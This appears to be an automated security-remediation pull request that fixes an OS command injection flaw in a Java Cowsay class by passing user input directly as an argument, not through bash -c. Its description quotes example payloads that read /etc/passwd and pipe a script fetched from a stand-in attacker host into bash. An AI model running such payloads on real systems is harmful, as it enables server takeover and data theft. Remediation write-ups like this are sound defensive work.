### PR TITLE
Checkmarx AI Remediation - Command_Injection

### DIFF
--- a/src/main/java/com/scalesec/vulnado/Cowsay.java
+++ b/src/main/java/com/scalesec/vulnado/Cowsay.java
@@ -6,9 +6,8 @@ import java.io.InputStreamReader;
 public class Cowsay {
   public static String run(String input) {
     ProcessBuilder processBuilder = new ProcessBuilder();
-    String cmd = "/usr/games/cowsay '" + input + "'";
-    System.out.println(cmd);
-    processBuilder.command("bash", "-c", cmd);
+    // Pass input as a separate argument to avoid shell interpretation (command injection prevention)
+    processBuilder.command("/usr/games/cowsay", input);
 
     StringBuilder output = new StringBuilder();
 


### PR DESCRIPTION
![Logo](https://cdn.ast.checkmarx.net/integrations/logo/Checkmarx.png)
**Checkmarx One – Remediation**

---

## Command_Injection · <img src="https://cdn.ast.checkmarx.net/integrations/severity/Critical.png" width="18" height="18" /> Critical

Triage context: <img src="https://cdn.ast.checkmarx.net/integrations/triage/reachable.png" width="16" height="16" /> **Reachable** · <img src="https://cdn.ast.checkmarx.net/integrations/triage/exploitable.png" width="16" height="16" /> **Exploitable**

Fix command injection vulnerability in Cowsay.java

**What is the issue?**
The application is vulnerable to OS command injection (CWE-77) in the `Cowsay` component. User-supplied HTTP query input is concatenated directly into a shell command string and executed via `processBuilder.command("bash", "-c", cmd)`, allowing attackers to inject arbitrary shell metacharacters. This enables execution of any OS command with the privileges of the application process by crafting malicious input such as `' && cat /etc/passwd` or `$(curl attacker.com/shell.sh | bash)`.

**Why should it be fixed?**
This is a critical-severity vulnerability (CVSS 10.0) that allows full server compromise through arbitrary command execution, data exfiltration of sensitive files and credentials, and lateral movement within internal networks. Any unauthenticated HTTP request can trigger the injection, making exploitation trivial. It also violates PCI DSS, NIST SP 800-53, and OWASP Top 10 compliance requirements.

**How should it be fixed?**
Replacing the shell-based invocation with a direct argument array in `Cowsay.java`. The vulnerable pattern constructs a shell string (`"/usr/games/cowsay '" + input + "'"`) and passes it to `bash -c`, which interprets shell metacharacters in the user input. The fix changes `processBuilder.command("bash", "-c", cmd)` to `processBuilder.command("/usr/games/cowsay", input)`, passing the user input as a discrete argv element directly to the `cowsay` binary via `execve(2)`. With no shell interpreter involved, metacharacters such as `;`, `|`, `&`, `$()`, and backticks are treated as literal text, making injection structurally impossible regardless of input content.



---
Use @Checkmarx to interact with Checkmarx PR Assistant. 
*Examples:*
`@Checkmarx how are you able to help me?`
`@Checkmarx rescan this PR`

<!--cx-integrations-metadata:{"remediationId":"b5ba1cce-c820-4c9f-ae6c-0ec7d9033e7b","resultId":"UgPnYpayjt0hj9lVb29r3m9+1aU="}-->